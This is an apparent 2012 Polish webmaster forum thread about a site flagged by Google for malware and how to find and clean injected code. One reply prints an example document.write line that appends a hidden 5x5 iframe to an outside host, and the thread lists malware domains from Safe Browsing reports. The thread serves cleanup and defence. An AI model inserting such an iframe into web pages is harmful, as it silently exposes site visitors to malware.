,,szkodliwy kod w Twojej witrynie" - Google blokuje strone. Opcje

[assasin]

Witam, od pewnego czasu zauważyłem że pozycja w google strony spadła, z 3000 wejść dziennie na 50;/ wszedłem do panelu google do narzędzia dla webmasterów a tam mam taką informacje:

Wykryliśmy szkodliwy kod w Twojej witrynie , dlatego będziemy wyświetlać ostrzeżenie dla użytkowników próbujących wejść na Twoje strony z wyników wyszukiwania Google.
Jak najszybciej oczyść witrynę.

Usunąłem wszystkie pliki z serwera i wrzuciłem nową kopie i niestety to nie pomogło, zastanawiam się w czym problem?
Przeszukałem bazę i tam nie ma nic nie pokojącego.

http://www.pmilosc.pl

Ten post edytował assasin 30.09.2012, 10:24:05

[szalek01]

jeśli miałeś wirusa na stronie a google zapamiętało to, to teraz musisz w https://www.google.com/webmasters/tools/ poszukać opcji z prośbą o ponowne przeskanowanie strony.

możliwe że któryś z skompresowanych js się google nie podoba

Ten post edytował szalek01 30.09.2012, 11:17:37

[assasin]

Zgłoszenie o sprawdzenie strony wysyłałem 2 razy i nadal są jakieś wirusy..

[netrat]

spójrz na http://www.google.com/safebrowsing/diagnos...site=pmilosc.pl
jeżeli pozbyłeś się problemu skorzystaj z instrukcji pod sekcją "Dalsze czynności"

jak można przeczytać "po raz ostatni znaleziono w niej podejrzane treści 2012-09-29" czyli jeszcze 2 dni temu na pewno był jakiś syf, tak więc popatrz uważnie.

powodzenia!

Ten post edytował netrat 1.10.2012, 15:47:02

[erix]

Opera też mi wyświetla ostrzeżenie, że coś jest nie tak.

[assasin]

Miałem dużo spamu w komentarzach, możliwe żę problem leży po stronie bazy danych?

[kyku]

Bardziej stawiał bym na syf w reklamach
lub
przeszukaj stronę czy nie ma tam żadnych iframe i/lub skryptów łączących się z jakimiś stronami *.ru

Złośliwe oprogramowanie działa w następującej liczbie domen: 21, m.in. pghnrmkoeoetfwsm.ru/, zenquqdskekaudbe.ru/, mfqfrnqllqcrayiw.ru/.

Wykryliśmy następującą liczbę domen: 1, które, jak się wydaje, pośredniczyły w rozpowszechnianiu złośliwego oprogramowania wśród użytkowników tej witryny, m.in. xndfbivuonkxfxrq.ru/.

Najszybciej, aby nie sprawdzać każdy skrypt kliknij F12 i w przejdź w zakładke Network (chrome ma wbudowane, firefox - firebug, opera - dragonfly, itd.)

Aktualnie żadne podstrony się nie ładują więc nie mogę sprawdzić a index wygląda na czysty.
PS. Lepiej przeskanuj też swój PC (IMG:style_emoticons/default/smile.gif)

Ten post edytował kyku 2.10.2012, 20:37:15

[assasin]

Macie nadal jakies błędy? bo google nic nie pokazuje a stron ładuje się normalnie.

[netrat]

wygląda ok, podeślij googlowi do przeskanowania przez webmastera i daj znać jak poszło.

[L00zak]

też nie widzę ostrzeżenia, powinno być ok, ah te WordPress'y...

[assasin]

Dziwne, mi nadal wyświetla osrzeżenie na operze (wyczyśćiłem przeglądarkę). Wy też macie?

[Damonsson]

Ostrzeżenie u mnie.

[erafaelmi]

Zazwyczaj są zainfekowane pliki *.js przez jakiś skrypt na stronie albo poprzez system komentarzy cz inputów które nie są zabezpieczone i jest możliwość wykonania kodu lub też istnieją luki w systemie cms. Ponadto jak są też jakieś linki (np. w bazie danych), pliki na stronie, które rozsyłają spam.
Doklejąją na końcu linii js ramkę z kodem, np.:

Kod

document.write('<iframe src="http://Rob.intelextraction.org/bcxbsdb.cgi?7" scrolling="auto" frameborder="no" align="center" height="5" width="5"></iframe>');

owa ramka oczywiście przekieruję na inną stronę.

Dla sprawdzenia jakie pliki zostały zmodyfikowane najlepiej podglonąć na serwerze po dacie modyfikacji.

Dla ciekawości sprawdziłem 2012-12-05 narzędziem Googla SafeBrowsing witrynę google.com (witryna www.google.com jest interpretowana jako inna i dlatego witryna z przedrostkiem www i bez niego to dwie odmienne witryny) i co ciekawego zobaczyłem:
bez www
http://www.google.com/safebrowsing/diagnos...site=google.com
z www
http://www.google.com/safebrowsing/diagnos...=www.google.com

Porada udzielana przez Google

Bezpieczne przeglądanie
Strona diagnostyczna witryny google.com

Jaki jest obecny stan bezpieczeństwa witryny google.com?

Ta witryna nie jest obecnie uznawana za podejrzaną.

W ciągu ostatnich 90 dni część tej witryny została odnotowana z uwagi na podejrzane działania następującą liczbę razy: 16.

Co się stało podczas odwiedzin tej witryny przez Google?

W ciągu ostatnich 90 dni przetestowaliśmy w tej witrynie następującą liczbę stron: 555281. Wyświetlanie 30 z nich spowodowało pobranie i zainstalowanie złośliwego oprogramowania bez zgody użytkownika. Witryna ta po raz ostatni była odwiedzana przez Google 2012-12-05, a po raz ostatni znaleziono w niej podejrzane treści 2012-12-04.

Złośliwe oprogramowanie obejmuje 225 trojan(s), 12 scripting exploit(s), 10 exploit(s). Udane zainfekowanie powodowało pojawienie się na komputerze docelowym średnio następującej liczby nowych procesów: 6.

Złośliwe oprogramowanie działa w następującej liczbie domen: 26, m.in. imaginginsider.com/, dgsdfhsdfh.osa.pl/, relay-hosting.net/.

Wykryliśmy następującą liczbę domen: 15, które, jak się wydaje, pośredniczyły w rozpowszechnianiu złośliwego oprogramowania wśród użytkowników tej witryny, m.in. googleusercontent.com/, skating-board.com/, endlessyears.com/.

Ta witryna działała w następującej liczbie sieci: 108, m.in. AS15169 (Google Internet Backbone), AS12956 (TELEFONICA), AS36040 (Bandaid XT+).

Czy ta witryna pośredniczyła w rozpowszechnianiu złośliwego oprogramowania?

Wydaje się, że w ciągu ostatnich 90 dni witryna google.com pośredniczyła w zarażeniu następującej liczby witryn: 21, m.in. www.jazaan.com.googlepages.com/, stroupecondoblog.com/, feedreader.com/.

Czy w tej witrynie działało złośliwe oprogramowanie?

Tak, w ciągu ostatnich 90 dni było w tej witrynie złośliwe oprogramowanie. Została przez nie zarażona następująca liczba domen: 3, m.in. juqi.com/, stonemountainvw.com/, hahait.com/.

...


Oczywiście takie zainfekowania wynikają z m.in. z usługi Witryny Google gdzie użytkownicy mają swoje witryny (IMG:style_emoticons/default/smile.gif)
Tu dla domeny onetu bez www
http://www.google.com/safebrowsing/diagnostic?site=onet.pl
z www
http://www.google.com/safebrowsing/diagnos...ite=www.onet.pl

Po usunięciu złośliwości ze strony wyszukiwarka Google różnie dochodzi do siebie. Widać, że niekiedy blokuje nadal domenę z www natomiast nie blokuję domeny bez www. Niestety jakby znalazła taką liczbę złośliwych skryptów na naszej domenie to od razu ustawi celownik na główną domenę nawet jak mamy zainfekowaną np. jedną witrynę wykorzystującą alias .

[vivamachine]

Udostępniliśmy prosty skrypt monitorowania witryn pod kątem infekcji i doklejania iframe.
http://www.semarch.pl/aktualnosci_news_101...--detektor.html

Darmowe - pobierać, używać albo nie narzekać(IMG:style_emoticons/default/wink.gif) )))) to nie jest komercyjne narzędzie ale pomaga przy monitorowaniu 10-30 domen.
Ustawić crona w zależności od wielkości strony co 5 minut (duże strony) lub 20 małych stron. co 10 minut dla małych stron.

Pozdrawiamy,
Semarch.pl